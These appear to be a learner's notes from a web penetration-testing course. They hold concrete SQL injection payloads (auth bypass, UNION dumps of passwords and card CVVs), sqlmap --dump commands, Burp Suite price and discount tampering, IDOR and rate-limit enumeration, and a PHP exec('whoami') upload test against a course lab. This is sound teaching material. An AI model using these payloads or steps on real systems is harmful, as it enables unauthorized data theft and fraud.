Programming Language- Every website has a backend part which is basically written as lines of code, using a programming language. So, the web server architecture includes a particular programming language that is used to write this code. Examples are: PHP, Python, Perl, Ruby, ASP (.NET), JSP, etc.

Database Software- Every website has users and it stores the information of these users in the database. So your login credentials, your preferences, cart items in case of an e-commerce, or any other details that you provide while accessing a website is stored in the database in a secure and efficient manner. And to access this data from the database, software is required. This is known as database software. Examples are: MySQL, MS SQL, MongoDB, Casandra DB, PostgreSQL, etc.

Front End Components- So, we know that every website has a frontend or a user interface, which is what the user sees on the browser while browsing through the website. So, there needs to be a front end language to write the front end code. Examples are: HTML, javascript, Jquery, CSS, Bootstrap, etc.

Now, we know that the architecture will contain one of each of these elements. We will look at some of the most common combinations of web server architecture in the next lesson.

Some of the most common web server architecture combinations are: (The front end component is not mentioned in any of these architecture combinations.)

WAMP- WAMP stands for Windows, Apache, MySQL, PHP. LAMP- LAMP stands for Linux, Apache, MySQL, PHP. It is one of the most frequently used combinations since all the components are available free of cost. MAMP- MAMP stands for Mac, Apache, MySQL, PHP. It is most commonly used for web development and local testing processes by Mac OS based developers. XAMPP- Unlike other web server architectures, XAMPP can be used across any operating system. So the X in XAMPP stands for cross platform. The rest of it stands for Apache, MariaDB and PHP.

WIMSA- It is the most commonly used Windows architecture. WIMSA stands for Windows, IIS, MS SQL, ASP.NET.

Some of the other non abbreviated web server architectures are: Windows, tomcat, JSP, PostgreSQL PHP, nginx, mongoDB Python, nginx, mongoDB To give you a clear picture, the most commonly used OS is Linux. Apache is the most commonly used server software and PHP is the most commonly used server side programming language.

Please learn the basics of HTML, javascript and PHP before proceeding.

How is data sent?

Data is sent using GET and POST methods. These methods are used as attribute value pairs in the form tag.

GET	POST
→ used to fetch output based on given data.	→ used to submit or update data in the database.

Reasons Why GET method cannot be used at all times:

→ GET requests get stored in the browser history, & it is not advise to store critical data in browser history.

→ GET requests can be used for relatively smaller data (generally 2048 characters), as compared to POST, which theoretically has no limit.

→ GET requests cannot be used for all kinds of characters. We can only send ASCII data using GET requests, whereas POST methods support a variety of characters.

→ File uploading cannot be done using GET. If you want an HTML form to upload files, you have to use the POST method.

Vulnerability Assessment & Penetration testing (VAPT)

What is Vulnerability Assessment? (VA)

The phase where a hacker or a security expert tries to find all the vulnerabilities in a system is called the Vulnerability Assessment phase.

Penetration testing: (PT)

The hacker tests the explosibility of a vulnerability. i.e he checks how much damage he can cause by exploiting that vulnerability.

OWASP Top 10 - 2013 Before we jump into the technicalities of the vulnerabilities listed in the OWASP Top 10 2013 list. Let’s quickly try to understand how these vulnerabilities work.

Vulnerability	Explanation
Injection	It allows hackers to inject server side codes or commands. These are the flaws that allow a hacker to inject his own codes/commands into the web server that can provide illegal access to the data.
Broken Authentication and Session Management	These flaws generally arise when application functions related to security and session management are not implemented properly, which allows hackers to bypass authentication mechanisms. For eg. Login
Cross Site Scripting (XSS)	This is one of the most common flaws in which hackers inject codes like HTML, JS directly into the web pages allowing them to deface websites and steal data of the users who trust these websites.
Insecure Direct Object References (IDOR)	These are the flaws that may cause severe impact as with IDORs, the hackers get access to objects in the database that belong to other users, which allows them to steal or even edit critical data of other users on the website. They can either steal that information or even delete someone’s account.
Security Misconfigurations	These are again one of the most common flaws as the developers/administrators forget to securely seal an application before making it live. Common flaws under this vulnerability include keeping default password, default pages etc.
Sensitive Data Exposure	These types of flaws occur when websites are unable to protect sensitive data like credit card information, passwords etc. which allows hackers to steal this information and may cause credit card fraud or identity theft.
Missing Function-Level Access Controls	These flaws occur when security implementations are not implemented properly in applications on both User interface and server i.e. front and back end respectively. This allows hackers to bypass security and gain restricted access.
Cross Site Request Forgery	This vulnerability allows a hacker to send forged requests on behalf of a trusted user, which allows the hacker to act on behalf of the user. For example, telling the bank server to transfer money from X to Y on the victim’s behalf and the bank server accepting it.
Using Components with Known Vulnerabilities	There are certain applications or their components that are known to exhibit vulnerabilities. If anyone is using these applications, it becomes easy for hackers to exploit these vulnerabilities and steal user data for eg. using an older version of windows server can be exploited by using an exploit code which is available online.
Unvalidated Redirects and Forwards	This flaw redirects users from a trusted website to a malicious website, which allows hackers to steal sensitive user information. For eg. if a user visits website A which he trusts but is redirected to website X which has malware. But as the user trusts A, he ends up trusting X.

OWASP

Depending on what kind of system we are dealing with (e.g. Mobile Application security, Firewall & Filler Bypass, Cheat sheets, Secure Code Development cheat sheets, web Application security Project etc) how we perform VAPT may change.

For testing web Applications, the majority of the security experts follow OWASP top 10 list.

OWASP: Open Web Application Security Project

It is a huge online community of security enthusiasts that produces free resources for people in the security domain. Hackers, developers, security experts & organisations use these resources to test their web Applications.

Every few years OWASP releases a consolidated list of top to common vulnerabilities found in the web Applications. 2013 one is most popular.

Security experts & hackers use these lists as a reference to test or hack web Applications.

Introduction to SQL & Databases

AL-Injections

Injections are the most common flaws or warrabilities found in web Applications.

Most common Injection: SQL injection.

What is SQL?

SQL is structured Query long which is used to query data from the database.

SQL basically helps web Applications in communicating with the database software to retrive or store data from or in the database.

What is a database?

A set of neatly structured data. e.g library.

→ it helps in making units of data more accessible.

→ Database is a collection of data stored by a website in a particular format. This data can be all the application info like: User info, messages, posts etc.

→ These databases store data in the form of tables.

Q. What are injections?

Ans. These are the vulnerabilities through which attackers gain illegal access to the data. It allows attackers to directly insert their commands/codes into the web server.

Q. What is SQL?

SQL is abbreviated as Structured Query language which is used to query data from the database. It helps in communicating to database software to retrieve/store data from/in the databases.

Q. What is a database?

Databases is a part of database software in which all the application information like user information, messages, posts etc. are placed in a structured, easy to access and secured way. These databases contain tables.; tables contain columns and rows and each row has separate cells storing data against the specific column in a specific format.

Q. How is SQL used to communicate with database software?

SQL is a language which is used inside Server Side Programming Languages to communicate to database software in order to Save data in databases and retrieve it later.

Q. What are the three types of commands used in MySQL?

Data Definition Language (DDL):- This command is used to define the structure of the data like how and where it would be stored. It is used in creating databases and tables, defining the structure of the tables and the columns. Examples include :- Create table, Alter table, Drop table.

Data Manipulation Language (DML):- These commands are used to manipulate already existing data inside a table or insert new data (rows) inside a table. It helps to edit, delete, and create rows. Example Commands: Insert into <table>, update table (rows) and delete table (rows).

Data Query Language (DQL):- These commands are used to Query data from the database i.e. fetch required data from the database. It is used to fetch data from all the rows, fetch specific data, sort data and even calculate values inside the rows. Examples: Select <columns> from <table>, Order by <column>.

Please learn to write basic SQL queries, and incorporate SQL with PHP before proceeding.

Introduction to SQL injection: authentication bypass

When we are trying to login, the webpage is checking the data in the database if there was a user with the same username and password.

Query used: SELECT \FROM user WHERE username = ‘husky’ AND password = ‘naruto123’*

The key to hacking this type of login authentication lies in the SQL query. whatever we add to the username and password field gets added to the query. Now, if we put test’hello in password, it will throw an error.

Query used: SELECT \FROM user WHERE username = ‘husky’ AND password = ‘test’hello’*

Similarly, we can add our own commands in the SQL query. If we enter test’ OR ‘a’=’a in the password field. (condition which is always true)

Query used: SELECT \FROM user WHERE username = ‘husky’ AND password = ‘test’ OR ‘a’= ‘a’*

Voila! Login successful!

This is SQL injection and this attack is called authentication bypass.

This is a very basic attack and wouldn’t work on google and facebook.

Commenting Out Part of SQL Query While performing SQL Injection, you will sometimes need to comment out the rest of the query after the payload. Here's how you can do that: In case of input field: You need to enter a space, then two hyphens and then again a space after the payload. For example: password' or '1' = '1' -- If the above method doesn't work, you can try entering a hash after the payload. For example: password' or '1' = '1'# In case of URL: When you add a space at the end of a URL, it doesn't get registered in the query, so you can't just type space, two hyphens and then space at the end of a URL. The plus sign (+) is the URL encoded form a space. So to comment out the rest of the query in a URL, you have to type space, two hyphens and then a plus sign after the payload. For example: something' or '1' = '1' --+

We can use UNION command to perform SQL injections like:

SELECT product, price FROM products UNION SELECT username, password FROM users.

Condition: number of columns should be the same.

Problems:

In a real life scenario, you won't be able to see the sql query used & you would have no idea how many columns are being fetched in the existing select query.
guessing the names of tables & columns doesn't always work.

Question: Study and research about concat() and group_concat() functions in MySQL and try using it in SQL injection.

Concat Function:

SQL CONCAT function is used to concatenate two strings to form a single string within a single row. So while extracting usernames and passwords, generally you do something like this (Assuming column 3 is showing the output):

For usernames:

id=1’ UNION SELECT 1,2,username,4 from users--+

For passwords:

id=1’ UNION SELECT 1,2,password,4 from users--+

But with concat(), you can get both in a single column like this:

id=1’ UNION SELECT 1,2,concat(username,password),4 from users--+

Note that there will be no space in between them but you can add a dash with this:

id=1’ UNION SELECT 1,2,concat(username,’ - ’,password),4 from users--+

GROUP_CONCAT

The GROUP_CONCAT() function in MySQL is used to concatenate data from multiple rows into one field.

Example query:-

union select 1,group_concat(table_name),3,4 from information_schema.tables--+

Here in the above query we are trying to fetch all tables present in the database in a single query. This is very helpful when a website is only giving one table at a time but we want to extract all tables.

Finding the number of columns using an SQL query

How to overcome the above problems?

Hit & trial method (for 1st problem):

If we know that there is a table named users in the database, and it has a column named usernames. But we don’t know how many columns are being fetched in the given website. We will use the following query:

….URL….UNION SELECT usernames, usernames FROM users.

In this we will keep adding usernames until error stops.

This is one way of knowing how many columns are being fetched in the given SQL query. But, this method is not practical when 50-100 columns are being fetched. Also, we should already know at least one column and one table name.

Therefore, a better method is, order by.

Order by:

Sorts output in an ascending order, based on the name or number of columns specified.

e.g. If we have

ID	Name	Age	GPA
1	Teeya	19	8.5
2	Ayush	15	9.0
3	Vyom	21	9.7
4	Akshat	22	7.5

If we want to sort these out alphabetically.

SQL query: SELECT* FROM students ORDER BY name

ID	Name	Age	GPA
4	Akshat	22	7.5
2	Ayush	15	9.0
1	Teeya	19	8.5
3	Vyom	21	9.7

Here we can also specify the number of columns instead of the name. I.e:

SQL query: SELECT* FROM students ORDER BY 2

So, if we want to sort based on age:

SELECT* FROM students ORDER BY 3

ID	Name	Age	GPA
2	Ayush	15	9.0
1	Teeya	19	8.5
3	Vyom	21	9.7
4	Akshat	22	7.5

Order by command can help us in speeding up the process of figuring out the number of columns being fetched.

→ For doing this: Instead of using UNION, in the URL, add ORDER BY 1 at the end & the content will get sorted based on contents in the 1st column. Similarly, ORDER BY 2, ORDER BY 3…. Until we get an error. If we get an error on the 5th, this means there were only 4 columns. This is how we find the number of columns being fetched.

Finding out the names of tables & columns in the Database

We can do this using a feature called information_Schema.

→ suppose we have a folder in which a site stores all its databases. In this folder, there will be different folders for the different products a website has. (eg: video-streaming service, mobile app, chat-thread etc.) among all these databases, there is also a database called information_schema. This database stores information about all the other databases present in the folder. (it's like an index page of this whole setup.) All popular database softwares have information_schema in them. This information_schema also holds the names of all the tables & columns present in other databases.

→ we will first need the name of the database we are working with. Here's how to find that out:

SELECT database ()....URL…..UNION SELECT database(), database (), database(), database()

4 times because we know that 4 columns were being fetched in the Existing query (last query we were working with).

output:

kjsndckjnsc	snmcsmncsk	kdjabkdjakdbk	nadkjlnqkjnwkqj
SQL-Injection-V4	SQL-Injection-V4	SQL-Injection-V4	SQL-Injection-V4

→ SQL-Injection-V4 is the name of the database we are interacting with.

→ There's a table called 'Tables’ in the information_schema. This holds the names of all the other tables. It will have many columns, but the 2 columns we need are table_name & table_schema.

table_name holds the names of all the tables & table_schema holds the name of the database that the tables are associated with.

Most likely, we won't be able to fetch data from other databases. Since We are interacting with SQL_Injection_V4 database.

to get the names of all the tables in SQL_Injection_V4, query used:

…..URL….SELECT table_name, table_name, table_name, table_name FROM information_schema.tables WHERE table_Schema = "SQL_Injection_V4"

Output:

hgjkgvgkhvk	fdgcjvghjvh	yfhgfjhgc	ydfgxsgfsfdgj
bank_details	bank_details	bank_details	bank_details
users	users	users	users
movies	movies	movies	movies

→ There is another table in the information_Schema which holds the names of all the columns in the database. its name is columns & it looks like this:

tftyjfhgvb	Column_name	table_name	table_schema	utfjghfgbv
Hjgjhgjh	Column 1	Table 1	SQL-Injection-V4	Gfvbnfc

We can fetch the names of all the columns in the bank details table by writing this query:

….URL….SELECT column_name, column_name, column_name, column_name FROM information_schema.columns WHERE table_schema ="SQL-Injection -V4" AND table_name="bank_details".

fghfvkgmbhcv	hjgnmbvg	yfgkxdgf	tyghchk
ID	ID	ID	ID
Account_no	Account_no	Account_no	Account_no
CVV	CVV	CVV	CVV

to fetch Account_no. & cvv :

…URL…UNION SELECT Account_no, cvv, Account_no, cvv FROM bank_details.

yhjgvnmgfvkhgc	ugjfcgrdedi	tfhgdjdsjsrs	fhkgmdtjy
123….6969	123	123….6969	123

How to perform SQLi in POST parameters:

→ Usually the POST parameter is used as it is safer.

→ we perform SQL injections by:

When the browser sends a post request to a server, we intercept the request in between, inject the parameters, & then send the request to the server. We do this using a proxy server.

→ Proxy server software we are going to use is: Burp Suite

→ Burp Suite is a local Proxy server that we can run on our own work station & configure at our browser to send all the traffic through it.

→ Most used hacking tool in VAPT & specifically designed for security experts.

→ It can do much more than just POST based SQL injections.

→ We will be using the community edition of Burp Suite. (Free) (with this, we can intercept HTTP requests, Alter them and release them to the servers. It can also keep log of all the

request flowing & even replay them later, when ever required.

With burp Suite, we can gain complete visibility & control of all the requests that the front end of a website sends to the backend.
For burp suite:

127.0.0.1 → loopback IP address.

8080 → Port number.

Whenever we will search something on the browser configured with burpsuite, it will keep loading as the request is being intercepted in the background and we will have to forward the request on burpsuite for it to load.

→ HTTPS requests are used to prevent hackers from snooping in.

→ To start intercepting the HTTPS requests, We need to download. the CA certificate.

→ trust this CA to identify websites.

In burp, under the HTTP history tab, we can see that it has stored all the requests that went through the browser & each request has a request & response tab.

→ In real life, so that we don’t have to switch between browser and burp again and again, we have a feature called repeater. It lets us see the request & response simultaneously. We can also see the response as HTML & render it. (Saves time while performing VAPT). If we want to analyse the response UI, then we have to see it in the browser itself (as render doesn't always show the correct UI).

How to perform POST based SQLi using burp suite.

A typical HTTP request starts with GET, POST, PUT, DELETE, OPTIONS etc. After method home, we have the exact file path name where the data is being sent. followed by the HTTP version no. (e.g. HTTP/101). Then we have HTTP headers. HTTP headers come in the form of name value pairs. (eg Host: hackingenv.internshala.com i.e header_name: value.of.header)

Some headers are mandatory, some are programming language specific.

Host: hackingenv.internshala.com → destination IP or the domain the request is going to: User_Agent: Mozilla/5.0 (Windows NT 10.0; Win 64; X64; rv:47.0).

Gecko/z0100101 firefox / 47.0 → tells the server what browser and operating system we are using.

Accept-Language: en-US, en; q=0.5

Accept-encoding: gzip, deflate

This tells the web application what kind of response we want.

Referrer: http://hackingenv.internshala.com/SQL-Injection/Post-Based-SQL-Injection-variant-1/

tells the web application from which URL the request is coming from.

Cookie: PHPSESSID=IK……..csr7

Connection: Close.

content-type: application/x-www-form-urlencoded.

tells what type of content is being sent. Here, an HTML form is being sent.

content-length: 11

tells the character length of the data we are sending. (data sent via HTTP request.)

→ It is written at the end of the request after the headers.

Here it is referring to: flower = rose value pair being sent. This is similar to the parameter value pair that we saw in the GET parameters.

If we see a new header, it may be containing some critical info about the security we are trying to break. So, every time you see a new header, research it. & check if there are any loopholes that we can exploit. At the end, we have the parameter value pair, where we can try to perform SQL injections.

At the end, if we try to add flower= rose’ , it will throw an error.

Now, the methods that we used in GET, we can extract info from the website using those same methods here too.

Advanced SQL Injections

So far, we have learnt 3 types of SQL Injections:

1. Basic Authentication Bypass

2. GET based SQL Injections

3. POST based SQL Injections Practising these SQL Injection methods are good to get you started. But there are other SQL Injection methods that you should know of. So we will briefly explain 3 more SQL Injection methods which you may encounter while researching or practising. Error Based SQL Injections: Sometimes, we cannot exploit SQL Injection vulnerabilities simply by using UNION command. This may be because of some security checks in place or because of the complexity of the code. So to perform error based SQL injections, we make websites to throw SQL errors through which we can extract critical information. Now, different database servers employ a different approach of performing error based SQL injections as the errors they throw are different in nature. For better understanding, let us have a look at the example below: In Microsoft SQL server, there is an SQL function called convert(), which is used to convert the second parameter to the data type given in the first parameter. Have a look at the syntax: convert(<data type>,<value>) This means, if we use convert(int,’145’), the output will be 145. But, what if we try to convert a value which is not a valid data type like this convert(int,’abcd’) As you might have expected, the server will throw an error saying: “Cannot convert string ‘abcd’ into an int” So, our motive is to perform SQL injection. This means, instead of using convert(int,’abcd) we ask the SQL server to convert(int,db_name()). As you know, db_name() is the same as database() and suppose the database name is ‘secret_database’. If we try to convert it, the server will throw an error saying: “Cannot convert ‘secret_database’ into int” Now, if a website throws a message that shows SQL errors, this means we can definitely perform SQL injection here. Using SQL injection, we can easily retrieve the name of the database. And once the database name is known we can easily fetch the names of the tables, columns and finally the data too. These SQL injections are referred to as Error based SQL injection, where we perform SQL injections when a web application throws an SQL error. Boolean Based Blind Injections: To understand the injection, let’s fragment it as Boolean + Blind Injections. So, Boolean in terms of programming simply means True or False. This means, while performing these injections, we might be asking the server to respond to us as either true or false. Now, the second part is Blind Injections or Blind SQL injections. As the name suggests, these injections are used where we are successfully able to fetch critical data but somehow the extracted data is not visible on the website (hence, the name blind), which may be attributed to how the website is built. So, combining both these parts, in Boolean based blind injections, we perform SQL injections by asking server True or False questions and on the basis of the response, we can extract crucial information. Let’s have a look at the example below: Suppose, If we want to fetch name of a student from a website, we will simply use this SQL query Select name from students where id=121 The output will be the name of the student against the id 121. Now, to perform Boolean based blind injections, we use the AND operator. Have a look at the query below where we have used boolean based blind injection to fetch the name of the student. Select name from students where id=121 AND 1=1+ As 1 equals to 1 us universally true, the output will fetch the name of the student. So, how is this injection different from others as we are just extracting the same information in a different way. Well, what if we use this query instead. Select name from students where id=121 AND 1=0+ Now, 1 can never be equal to zero, this means the output will be blank. So, in such cases boolean based blind injections come into play. This is how the query will look like: Select name from students where id=121 AND (get_first_character_of(password))=’a’--+ Look carefully, this time we are asking server to tell us the first character as ‘true’ or ‘false’. If the output shows the student name, this means the password starts from ‘a’ and we can proceed further in a similar way to fetch the complete password and if there is no output, it means that the password must start with some other letter. This is how Boolean based Blind Injections are performed. Time Based Blind Injections: These injections are used in those cases where we fail to extract data either by using UNION or ERROR based SQL injections and can neither ask a website questions as True or False. So, in order to extract critical information, we tamper with the server response time. Whenever a request is made to the server, it takes some time to fetch the information and deliver it to us, this is called response time. Now, if we tamper with this response time, we can extract some crucial information. The syntax of Time based Blind injections is similar to Boolean based blind injections. Have a look at the query for time based blind injections. Select name from students where id=121 AND (if the 1st character of the password = ‘a’ then sleep for 10 seconds)--+ Here, you can see, we are asking the server to tell us the first character of the password. If the password starts from ‘a’, the server will sleep for 10 seconds, which means an increase in response time by 10 seconds. And, if the password does not start with ‘a’, the server will take its usual response time. In a similar way, we can predict the whole password. This is how Time based blind injections are performed. Using this injection has a lot of disadvantages. Firstly, as you can see every time we are making a request to the server, it sleeps for 10 seconds. This means, this injection will take a lot of time. Secondly, the response time is also dependent on the speed of the internet. If the connection drops in between, it will increase the response time and hence will lead to faulty results.

Automating SQL injections

As we saw, manually checking & exploiting SQL injections is very time taking. So, most security experts check & exploit SQL vulnerabilities using automated tools. One of the most powerful tools for finding & exploiting SQL injections is SQL map.

What is SQL map?

SQL map is a python based tool that was built to check if parameters in an HTTP request are vulnerable to SQL injection. It can also extract data from the database using various SQL injection techniques. It supports a wide range of scenarios & use cases & works on almost all SQL server software.

Exploiting POST parameters SQLi

SQL map does not come with GUI or graphic user Interface so we will use the terminal.

There are switches in SQLmap (-u, -h, -p, --help, --tables, -- column)

→ If switch is 1 character long, single hyphen is used (-u, -h, -P)

→ if switch is more than 1 character long, 2 hyphens are used (--help, tables, -columns etc)

To test a URL for SQL injection:

For MAC: sqlmap -u “....URL….”

For windows: python sqlmap.py -u “....URL….”

-u switch is the short version of URL switch. It is used to pass a URL through SQL map. When we press enter, SQL map will start checking this URL for sql injections. It will also ask a few questions along the way. default answer is represented by capital letter [Y/n]

→Depending on how complex the architecture is, SQL map may take some time.

SQLmap is now sending numerous requests to the URL we provided & is checking if the URL we provided is vulnerable to any type of SQL injection. i.e it is checking for union based, error based, boolean & time based SQL injections.

→ Testing for time based injections takes longer timer

→ Once done, (eg:) we will see that SQL map is telling us that the category parameter is vulnerable to boolean based blind injection, error based injection, AND/OR time based blind injections & union query based injections. It is also telling us that the database software is My SQL.

Now we will follow the same steps we followed earlier.

Figuring out the name of the database → figuring out names of all the tables → all the columns → ask for the data we want.

Sqlmap -u".... URL…." --dbs

this will display all the databases that the URL can interact with. (eg:)

[*] information_schema

[*] SQL_Injection_V4

Now, we will: sqlmap -u “...URL…” -D “SQL_injection_V4” --tables

Output:

bank_details

movies

Users

To fetch all the columns,

sqlmap -u “...URL…” -D “SQL_injection_V4” -T “bank_details” --columns

Output:

Column	Type
Account_no	varchar(19)

Now,

sqlmap -u “...URL…” -D “SQL_injection_V4” -T “bank_details” -C “account_no, CVV, id” --dump

How to test Authenticated Web Pages using SQLMap?

Authentication is usually controlled by cookies.
If you are running SQL map on a URL that you cannot access in incognito (access restricted). You have to pass a cookie in sqlmap, which is responsible for the authentication.

sqlmap -u “...URL…” --dbs --cookie “key=F4OC…..F8A”

How to Automate POST based SQL Injections?

turn intercept on in burp suite. request page on browser & go to burp suite, select the whole request.

Now right click & click copy to file. choose any name and save as .txt (eg: xyz.txt) in the SQL map folder. (where homebrew etc are saved).

Now go to SQL map, & type

Sqlmap -r “xyz.txt”

click enter & sql map will start testing the variant for sql injection.

We saved the request to a txt file & used the request file switch (-r) to call that file. Sqlmap automatically parches the request & checks for sql injection. And we don't have to worry about any cookies or authentication because all the cookies are by default present in the request.

Output: Sqlmap is telling us that the parameter: sign is vulnerable to error-based & union-based sql injections. Now, we can use the same switches as before to extract data. sqlmap -r “xyz.txt” --dbs

& so on.

Understanding Web Application Filters.

e.g. Web Application filters.

Please enter a valid email ID: if the entered field doesn’t have @ in it.
Entering letters in a phone number field gives an error or (enter valid phone number)
Required img format: if we need to upload .jpg then uploading .png will throw an error.
If only 10 characters are allowed, and we try to enter more, it will throw an error.
You have to click on the I agree to the terms box, before proceeding.
You cannot edit non-editable fields like the price of a product.

There are examples of web application filters.

They are input or check fields which have some criteria based on which the input is either accepted or not accepted.

How are these filters implemented?

There are 2 ways: client side filters & server side filters.

Client side filters: Verifying the inputs on the client side.

There would be a code running on the browser that validates the input before sending it to the server. Code is written using client side language. e.g: HTML & javascript.

Server side filters: Verifying the input on the server side.

The input is passed on to the server side as it is & is validated by the server. Code is written using server side language.

On the server side, input is sent directly to the server & it checks if input is valid or not. The checks are happening out of our reach & therefore, not easy to bypass as we don't even know the conditions of these filters.

On the client side, input is validated before sending to the server. Therefore They are in our reach. As our browser is checking the data & we can tamper it using burpsuite.

Steps to bypass client side filters:

Enter correct data in the input Held.
Let the client side validate this input.
Intercept this data.
Tamper or change the data.
Now, send the changed input to the server side.
If there are no server side filter checks, then the invalid input will be accepted.

Bypassing Client Side filters with Burp suite:

Let's say we have to sign up somewhere.

We know that we cannot proceed by entering invalid data and without agreeing to the terms and conditions as it will throw an error.

So we will enter the correct details, check the I agree box. Turn on intercept in burp suite & click enter. We will see that the request has been intercepted by the proxy (burp site).

At the end of the request, we will see:

email = randommail%.40email.com & password = 1234

Fname = Teega and Lname = Ojha & terms = true.

Here, %40 is the URL encoded form of @

And terms = true means that we checked the box.

Now we can tamper the data and we can also delete the terms parameter. (if unable to delete, then just leave it blank/ make it 0 or NULL/ false). Now forward the request. If there are no server side checks, registration will be successful.

→Such a vulnerability is called Improper or Missing Server Side Validation Vulnerability.

Another example:

Suppose we have a website selling headphones worth 3000, with a discount of 300. We will add the item to the cart and proceed to checkout and intercept the request.

Now, from burp suite, we will try changing the price of the headphones. From:

price = 3000 , discount = 300 and wallet balance = 500

To: price = 800 , discount = 300 and wallet balance = 500

Forward, & as we see that there is a server side validation check on the product price. So it will throw an error.

Now, if we go back to the payment page and try changing the wallet balance to 2700. And if it again throws an error, this means that there is a server side check on wallet balance as well.

Now, if we go back to the payment page and try changing the discount from 300 to 2500 and then proceed. result: order placed! This means that there is no server side check on discount.

IDOR: Insecure Direct Object Reference

Suppose we require a roll number and name to view the result of an exam. So we can also view our friend’s result. (here, friend’s name is the object)

Example 1 (GET based): Suppose we can see phone bill of some user & at the end of the url, we have:

….URL….user_id=1438 (GET based request)

Now, we can with this data.

let's try: user_id=1437 result: No user found.

let's try: user_id =1439 result: Phone bill of some other user.

This is an example of IDOR.

If user id were alphanumeric, it would have been difficult for us to guess.

Example 2 (POST based): When we can see details of user (call history) but nothing is visible in the URL, we know that it is a POST based request.

If we go to the proxy tab in burp suite, we can see it is a POST based request & we will send this request to the repeater.

(response → render).

We can see the call history & under request, we can also see the phone no. of the user. (request → raw)

Here, we can change the phone no. & then view the call history of the phone no. we entered.

Therefore, Web applications contain IDOR vulnerability for POST based requests.

Exploiting rate limiting Flaws:

In example 1 of the last topic, we saw that user 1437 did not exist. i.e user ids are random & not in sequence. So to find the IDs of all users, do we have to keep doing it manually? (guessing all 4 digit numbers)

If we keep changing the ID for 10 or 20 users & the website doesn't block us, this vulnerability is called rate limiting flaw.

Rate limiting flaw: flaw that does not limit the no. of attempts you make on a website's server to extract some data.

To exploit this flaw, we will use the Intruder Module of burp suite.

select the request→ right click → send to Intruder → Intruder tab will glow orange.

This indicates that the request has been sent. In the Intruder tab (Intruder → target) we see fields have already been filled. (Host: hackingenv.Intershala.com & Part: 80).

Under it, we will have a tab named positions.

Positions: This lists out all the possible points from where the request can be exploited.

We will clear the cookie header for now, & will focus on exploiting the user ID part. We will keep Attack type to sniper (great for attacking one insertion point.)

Now we will move to the next tab, Payload.

Payload: We define the parameters here. We will set the payload type to numbers. (since, our user ID has numbers in it.) Then, we will define the range of numbers. (1000-1500) (more range → more time taken by burp suite to attack). Now, we will start the attack.

We will see a lot of new tabs. The 1st tab with the request valve as zero, is our base request that we have sent to the intruder. The payload tab tells us the valve that was inserted at a given position.

The Status tab tells us the HTTP response status.

200: ok

404: not found

302: redirected

The length tab represents the length of the result. There are numbers displayed under this tab.

The base request has a response length of 38183 & the response length of other requests is much lower (491). This means that all requests with such less response lengths are probably due to invalid user IDs. (i.e no data exists against these IDs.)

If a response length is close to the base request (more than response length for incorrect ID request) it is a correct user ID.

We can sort the result in order of descending length size by clicking on the length tab.

We can select any request & see its response using the render tab. (just like before) or by sending the request through the browser. (request tab → right click → request in browser → in original session → copy link → use in browser).

Just like IDOR, Rate limiting can also be a critical vulnerability. Here's how:

Suppose a website allows us to refer our membership to a friend all we need to do is enter an email ID & click on refer. (we will find a referral in our inbox.).

Now, we will turn on Intercept on burp suite & then send requests for referral. To check for rate limiting flaws, we will send the request to the intruder & clear all insertion points (cookies).

Now, in the payload's tab, we will select null payloads as payload types & also we will specify the no. of requests and we wanna send (In this case: 100).

Generate 100 payloads.

Hit enter and We will find 100 new referrals in the inbox.

Imagine the lead on the server if this was increased to a million requests.
Imagine the loss if website is being charged for every referral sent or phone call was being made for every request

Therefore, Absence of proper rate limiting can be harmful.

Question: Read about other types of attacks in Intruder like Cluster Bomb, Pitch Fork, and Battering Ram.

Ans: Types of attacks in Intruder

Cluster Bomb - This uses multiple payload sets. There is a different payload set for each defined position (up to a maximum of 20). The attack iterates through each payload set in turn, so that all permutations of payload combinations are tested. I.e., if there are two payload positions, the attack will place the first payload from payload set 2 into position 2, and iterate through all the payloads in payload set 1 in position 1; it will then place the second payload from payload set 2 into position 2, and iterate through all the payloads in payload set 1 in position 1. This attack type is useful where an attack requires different and unrelated or unknown input to be inserted in multiple places within the request (e.g. when guessing credentials, a username in one parameter, and a password in another parameter). The total number of requests generated in the attack is the product of the number of payloads in all defined payload sets - this may be extremely large.

Pitchfork- This uses multiple payload sets. There is a different payload set for each defined position (up to a maximum of 20). The attack iterates through all payload sets simultaneously, and places one payload into each defined position. In other words, the first request will place the first payload from payload set 1 into position 1 and the first payload from payload set 2 into position 2; the second request will place the second payload from payload set 1 into position 1 and the second payload from payload set 2 into position 2, etc. This attack type is useful where an attack requires different but related input to be inserted in multiple places within the request (e.g. a username in one parameter, and a known ID number corresponding to that username in another parameter). The total number of requests generated in the attack is the number of payloads in the smallest payload set.

Battering Ram - This uses a single set of payloads. In general, this attack is useful where an attack requires the same input to be inserted in multiple places in the request.

Example: Consider a page having two input fields, now to check for XSS, we require the Burp intruder to put each payload in the request where we are having multiple payload positions.

Question: Read about other payload types including Brute Forcer, Dates, Username Generator, Null Payloads, etc.

Payload Types

Bruteforcer: This payload type generates payloads of specified lengths that contain all permutations of a specified character set. The following options are available: Character set - The set of characters to be used in the payloads. Note that the total number of payloads increases exponentially with the size of this set. Min length - The length of the shortest payload. Max length - The length of the longest payload.

Dates: This payload type generates date payloads within a given range and in a specified format. This payload type may be useful during brute forcing (e.g. guessing the date of birth component of a user's credentials).

Username Generator: This payload type lets you configure a list of names or email addresses, and derives potential usernames from these using various common schemes.

NULL Payloads: This payload type generates payloads whose value is an empty string. This payload type is useful when an attack requires the same request to be made repeatedly, without any modification to the basic template.

Earlier, when we discussed the concept of shared hosting. If website a and b are hosted on a server, we can use website a to gain access to the server and hence of website b. (or any website hosted on that server). To get into a server, we need to attack a website & then get into the server.

Ways to attack / Infect a web server

→ Uploading a malicious program / script on the server to gain complete access via a backdoor.

→ Injecting commands in the web Application software.

→ Finding & exploiting an existing backdoor.

→ Exploiting a software running on the server which has a known vulnerability.

→ Cracking the password of remote control services like FTP, Telnet, SSH, RDP etc.

→ Hacking another server connected to the server of interest & then exploiting them.

Understanding base file upload Vulnerabilities

Suppose there is some website where we have to upload our resume in .pdf format. As soon as we upload, a download link appears against the uploaded file (i.e. we can download the file back). Let's try uploading a .jpeg / .txt /or .php file. (php: server side programming language and to execute commands on a server). Let's try uploading a php file & make the server do something. We will upload a sample php file with hello world code. (The 1st flaw is, despite asking for a pdf, the web application is letting us upload files in other formats too.) We will now try to download our php file. (We know that a php file is always executed & not downloaded). So, when we click on download, the code will get executed. This type of Vulnerability is called Arbitrary file upload vulnerability.

We will now do penetration testing to see how much we can exploit. We will now upload a php file with the following code:

<?php

echo exec (‘whoami’);

Exec: function used to execute windows or linux commands directly & print the response.

Whoami: command used to show the current user like the administrator/ guest/root etc.

